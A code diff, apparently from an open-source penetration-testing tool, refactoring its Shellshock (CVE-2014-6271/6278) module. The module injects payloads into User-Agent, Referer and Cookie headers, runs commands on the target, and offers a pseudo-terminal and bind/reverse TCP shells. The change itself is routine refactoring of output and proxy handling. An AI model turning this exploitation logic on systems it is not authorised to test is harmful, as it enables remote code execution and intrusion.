@@ -12,7 +12,6 @@ from src.utils import common
 from src.utils import menu
 from src.utils import logs
 from src.utils import settings
-from src.core.requests import tor
 from src.core.requests import proxy
 from src.thirdparty.colorama import Fore, Back, Style, init
 from src.core.shells import bind_tcp
@@ -26,7 +25,7 @@ default_cookie = ""
 
 if menu.options.cookie:
   if settings.INJECT_TAG in menu.options.cookie:
-    menu.options.cookie = menu.options.cookie.replace(settings.INJECT_TAG ,"")
+    menu.options.cookie = menu.options.cookie.replace(settings.INJECT_TAG , "")
   default_cookie = menu.options.cookie
 
 """
@@ -36,19 +35,12 @@ This module exploits the vulnerabilities CVE-2014-6271 [1], CVE-2014-6278 [2] in
 """
 
 if settings.MULTI_TARGETS or settings.STDIN_PARSING:
+  if settings.COOKIE_INJECTION:
+    settings.COOKIE_INJECTION = None
   if settings.USER_AGENT_INJECTION:
     settings.USER_AGENT_INJECTION = None
   if settings.REFERER_INJECTION:
     settings.REFERER_INJECTION = None
-  if settings.COOKIE_INJECTION:
-    settings.COOKIE_INJECTION = None
-
-# Available HTTP headers
-headers = [
-"User-Agent",
-"Referer",
-"Cookie",
-]
 
 # Available Shellshock CVEs
 shellshock_cves = [
@@ -76,6 +68,23 @@ def shellshock_exploitation(cve, cmd):
   payload = shellshock_payloads(cve, attack_vector)
   return payload
 
+"""
+Print percentage calculation
+"""
+def print_percentage(no_result, response_info, cve, float_percent):
+  if float(float_percent) == 100:
+    if no_result == True:
+      percent = settings.FAIL_STATUS
+    else:
+      percent = settings.info_msg
+      no_result = False
+  elif len(response_info) > 0 and cve in response_info:
+    percent = settings.info_msg
+    no_result = False
+  else:
+    percent = str(float_percent)+ "%"
+  return percent, no_result
+
 """
 Enumeration Options
 """
@@ -99,7 +108,7 @@ def enumeration(url, cve, check_header, filename):
 
   if menu.options.is_root:
     checks.print_enumenation().check_privs_msg()
-    cmd = re.findall(r"" + "\$(.*)", settings.IS_ROOT)
+    cmd = re.findall(r"" + r"\$(.*)", settings.IS_ROOT)
     cmd = ''.join(cmd)
     cmd = checks.remove_parenthesis(cmd)
     shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
@@ -178,9 +187,6 @@ Execute the bind / reverse TCP shell
 """
 def execute_shell(url, cmd, cve, check_header, filename, os_shell_option):
   shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
-  err_msg = "The " + os_shell_option.split("_")[0] + " "
-  err_msg += os_shell_option.split("_")[1].upper() + " connection has failed."
-  print(settings.print_critical_msg(err_msg))
 
 """
 Configure the bind TCP shell
@@ -259,7 +265,7 @@ def check_options(url, cmd, cve, check_header, filename, os_shell_option, http_r
   # The "os_shell" option
   elif os_shell_option == "os_shell": 
     warn_msg = "You are into the '" + os_shell_option + "' mode."
-    print(settings.print_warning_msg(warn_msg))
+    settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
     return go_back, go_back_again
 
   # The "bind_tcp" option
@@ -272,9 +278,9 @@ def check_options(url, cmd, cve, check_header, filename, os_shell_option, http_r
     go_back, go_back_again = reverse_tcp_config(url, cmd, cve, check_header, filename, os_shell_option, http_request_method, go_back, go_back_again)
     return go_back, go_back_again
 
-  # The "quit" option
-  elif os_shell_option == "quit":                    
-    raise SystemExit()
+  # The "quit" / "exit" options
+  elif os_shell_option == "quit" or os_shell_option == "exit":                    
+    checks.quit(filename, url, _ = True)
 
 """
 The main shellshock handler
@@ -291,8 +297,8 @@ def shellshock_handler(url, http_request_method, filename):
 
   try: 
     i = 0
-    total = len(shellshock_cves) * len(headers)
-    for check_header in headers:
+    total = len(shellshock_cves) * len(settings.SHELLSHOCK_HTTP_HEADERS)
+    for check_header in settings.SHELLSHOCK_HTTP_HEADERS:
       for cve in shellshock_cves:
         # Check injection state
         settings.DETECTION_PHASE = True
@@ -303,48 +309,38 @@ def shellshock_handler(url, http_request_method, filename):
 
         # Check if defined "--verbose" option.
         if settings.VERBOSITY_LEVEL != 0:
-          print(settings.print_payload(payload))
+          settings.print_data_to_stdout(settings.print_payload(payload))
         header = {check_header : payload}
         request = _urllib.request.Request(url, None, header)
-        if check_header == "Cookie":
+        if check_header == settings.COOKIE:
           menu.options.cookie = payload 
-        if check_header == "User-Agent":
+        if check_header == settings.USER_AGENT:
           menu.options.agent = payload
         log_http_headers.do_check(request)
         log_http_headers.check_http_traffic(request)
         # Check if defined any HTTP Proxy.
-        if menu.options.proxy:
+        if menu.options.proxy or menu.options.ignore_proxy or menu.options.tor: 
           response = proxy.use_proxy(request)
-        # Check if defined Tor.
-        elif menu.options.tor:
-          response = tor.use_tor(request)
         else:
           response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT)
-        if check_header == "Cookie":
-          menu.options.cookie = default_cookie
-        if check_header == "User-Agent":
-          menu.options.agent = default_user_agent  
-        percent = ((i*100)/total)
-        float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
-
-        if str(float_percent) == "100.0":
-          if no_result == True:
-            percent = settings.FAIL_STATUS
-          else:
-            percent = settings.info_msg
-            no_result = False
-
-        elif len(response.info()) > 0 and cve in response.info():
-          percent = settings.info_msg
-          no_result = False
 
+        if type(response) is bool:
+          response_info = ""
         else:
-          percent = str(float_percent)+ "%"
+          response_info = response.info()
+
+        if check_header == settings.COOKIE:
+          menu.options.cookie = default_cookie
+        if check_header == settings.USER_AGENT:
+          menu.options.agent = default_user_agent  
+
+        percent, float_percent = checks.percentage_calculation(i, total)
+        percent, no_result = print_percentage(no_result, response_info, cve, float_percent)
 
         if settings.VERBOSITY_LEVEL == 0:
           info_msg = "Testing the " + technique + "." + "" + percent + ""
-          sys.stdout.write("\r" + settings.print_info_msg(info_msg))
-          sys.stdout.flush()
+          settings.print_data_to_stdout(settings.END_LINE.CR +settings.print_info_msg(info_msg))
+          
 
         if no_result == False:
           # Check injection state
@@ -364,13 +360,13 @@ def shellshock_handler(url, http_request_method, filename):
           if settings.VERBOSITY_LEVEL != 0:
             checks.total_of_requests()
 
-          finding = check_header + settings.SINGLE_WHITESPACE + vuln_parameter
+          settings.CHECKING_PARAMETER = check_header + settings.SINGLE_WHITESPACE + vuln_parameter
           # Print the findings to terminal.
-          info_msg = finding + " appears to be injectable via " + technique + "."
+          info_msg = settings.CHECKING_PARAMETER + " appears to be injectable via " + technique + "."
           if settings.VERBOSITY_LEVEL == 0:
-            print(settings.SINGLE_WHITESPACE)
-          print(settings.print_bold_info_msg(info_msg))
-          print(settings.print_sub_content(payload))
+            settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
+          settings.print_data_to_stdout(settings.print_bold_info_msg(info_msg))
+          settings.print_data_to_stdout(settings.print_sub_content(payload))
 
           # Enumeration options.
           if settings.ENUMERATION_DONE:
@@ -412,7 +408,7 @@ def shellshock_handler(url, http_request_method, filename):
             cmd = menu.options.os_cmd 
             checks.print_enumenation().print_single_os_cmd_msg(cmd)
             shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
-            checks.print_single_os_cmd(cmd, shell)
+            checks.print_single_os_cmd(cmd, shell, filename)
 
           # Pseudo-Terminal shell
           try:
@@ -422,21 +418,15 @@ def shellshock_handler(url, http_request_method, filename):
             while True:
               if go_back == True:
                 break
-              message = settings.CHECKING_PARAMETER + " is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > "
-              if settings.CRAWLING:
-                settings.CRAWLED_URLS_INJECTED.append(_urllib.parse.urlparse(url).netloc)
-              if not settings.STDIN_PARSING:
-                gotshell = common.read_input(message, default="Y", check_batch=True)
-              else:
-                gotshell = common.read_input(message, default="n", check_batch=True)
+              gotshell = checks.enable_shell(url)
               if gotshell in settings.CHOICE_YES:
-                print(settings.OS_SHELL_TITLE)
+                settings.print_data_to_stdout(settings.OS_SHELL_TITLE)
                 if settings.READLINE_ERROR:
                   checks.no_readline_module()
                 while True:
                   if not settings.READLINE_ERROR:
                     checks.tab_autocompleter()
-                  sys.stdout.write(settings.OS_SHELL)
+                  settings.print_data_to_stdout(settings.END_LINE.CR +settings.OS_SHELL)
                   cmd = common.read_input(message="", default="os_shell", check_batch=True)
                   cmd = checks.escaped_cmd(cmd)
                   if cmd.lower() in settings.SHELL_OPTIONS:
@@ -447,27 +437,24 @@ def shellshock_handler(url, http_request_method, filename):
                         break
                       if go_back and go_back_again:
                         return True 
-                    # else:
-                    #   logs.logs_notification(filename)
-                    #   return True
                   else: 
                     shell, payload = cmd_exec(url, cmd, cve, check_header, filename)
                     if shell != "":
                       # Update logs with executed cmds and execution results.
                       logs.executed_command(filename, cmd, shell)
-                      print(settings.command_execution_output(shell))
+                      settings.print_data_to_stdout(settings.command_execution_output(shell))
                     else:
                       debug_msg = "Executing the '" + cmd + "' command. "
                       if settings.VERBOSITY_LEVEL == 1:
-                        print(settings.print_debug_msg(debug_msg))
-                        print(settings.print_payload(payload))
+                        settings.print_data_to_stdout(settings.print_debug_msg(debug_msg))
+                        settings.print_data_to_stdout(settings.print_payload(payload))
                       elif settings.VERBOSITY_LEVEL >= 2:
-                        print(settings.print_debug_msg(debug_msg))
-                        sys.stdout.write(settings.print_payload(payload))
+                        settings.print_data_to_stdout(settings.print_debug_msg(debug_msg))
+                        settings.print_data_to_stdout(settings.print_payload(payload))
                       if settings.VERBOSITY_LEVEL >= 2:
-                        print(settings.SINGLE_WHITESPACE)
+                        settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
                       err_msg = common.invalid_cmd_output(cmd)
-                      print(settings.print_error_msg(err_msg))
+                      settings.print_data_to_stdout(settings.print_error_msg(err_msg))
               elif gotshell in settings.CHOICE_NO:
                 if checks.next_attack_vector(technique, go_back) == True:
                   break
@@ -487,14 +474,14 @@ def shellshock_handler(url, http_request_method, filename):
               break
           
           except (KeyboardInterrupt, SystemExit): 
-            print(settings.SINGLE_WHITESPACE)
+            settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
             raise
 
           except EOFError:
             if settings.STDIN_PARSING:
-              print(settings.SINGLE_WHITESPACE)
+              settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
             err_msg = "Exiting, due to EOFError."
-            print(settings.print_error_msg(err_msg))
+            settings.print_data_to_stdout(settings.print_error_msg(err_msg))
             raise
 
           except TypeError:
@@ -502,9 +489,9 @@ def shellshock_handler(url, http_request_method, filename):
 
     if no_result == True:
       if settings.VERBOSITY_LEVEL == 0:
-        print(settings.SINGLE_WHITESPACE)
+        settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
       err_msg = "All tested HTTP headers appear to be not injectable."
-      print(settings.print_critical_msg(err_msg))
+      settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
       raise SystemExit()
     else:
       logs.logs_notification(filename)
@@ -514,8 +501,8 @@ def shellshock_handler(url, http_request_method, filename):
       response = False  
     elif settings.IGNORE_ERR_MSG == False:
       err = str(err_msg) + "."
-      print(settings.SINGLE_WHITESPACE)
-      print(settings.print_critical_msg(err))
+      settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
+      settings.print_data_to_stdout(settings.print_critical_msg(err))
       continue_tests = checks.continue_tests(err_msg)
       if continue_tests == True:
         settings.IGNORE_ERR_MSG = True
@@ -526,12 +513,12 @@ def shellshock_handler(url, http_request_method, filename):
     err_msg = str(err_msg.reason).split(settings.SINGLE_WHITESPACE)[2:]
     err_msg = ' '.join(err_msg)+ "."
     if settings.VERBOSITY_LEVEL != 0 and settings.LOAD_SESSION == False:
-      print(settings.SINGLE_WHITESPACE)
-    print(settings.print_critical_msg(err_msg))
+      settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
+    settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
     raise SystemExit()
 
   except _http_client.IncompleteRead as err_msg:
-    print(settings.print_critical_msg(err_msg + "."))
+    settings.print_data_to_stdout(settings.print_critical_msg(err_msg + "."))
     raise SystemExit()  
     
 """
@@ -549,27 +536,24 @@ def cmd_exec(url, cmd, cve, check_header, filename):
       payload = shellshock_exploitation(cve, cmd)
       debug_msg = "Executing the '" + cmd + "' command. "
       if settings.VERBOSITY_LEVEL != 0:
-        sys.stdout.write(settings.print_debug_msg(debug_msg))
+        settings.print_data_to_stdout(settings.print_debug_msg(debug_msg))
 
       if settings.VERBOSITY_LEVEL != 0:
-        print(settings.SINGLE_WHITESPACE)
-        print(settings.print_payload(payload))
+        settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
+        settings.print_data_to_stdout(settings.print_payload(payload))
 
       header = {check_header : payload}
       request = _urllib.request.Request(url, None, header)
-      if check_header == "User-Agent":
+      if check_header == settings.USER_AGENT:
         menu.options.agent = payload
       log_http_headers.do_check(request)
       log_http_headers.check_http_traffic(request)
       # Check if defined any HTTP Proxy.
-      if menu.options.proxy:
+      if menu.options.proxy or menu.options.ignore_proxy or menu.options.tor: 
         response = proxy.use_proxy(request)
-      # Check if defined Tor.
-      elif menu.options.tor:
-        response = tor.use_tor(request)
       else:
         response = _urllib.request.urlopen(request, timeout=settings.TIMEOUT)
-      if check_header == "User-Agent":
+      if check_header == settings.USER_AGENT:
         menu.options.agent = default_user_agent  
       shell = checks.page_encoding(response, action="decode").rstrip().replace('\n',' ')
       shell = re.findall(r"" + TAG + "(.*)" + TAG, shell)
@@ -577,8 +561,8 @@ def cmd_exec(url, cmd, cve, check_header, filename):
       return shell, payload
 
     except _urllib.error.URLError as err_msg:
-      print(settings.SINGLE_WHITESPACE)
-      print(settings.print_critical_msg(err_msg))
+      settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
+      settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
       raise SystemExit()
 
   shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
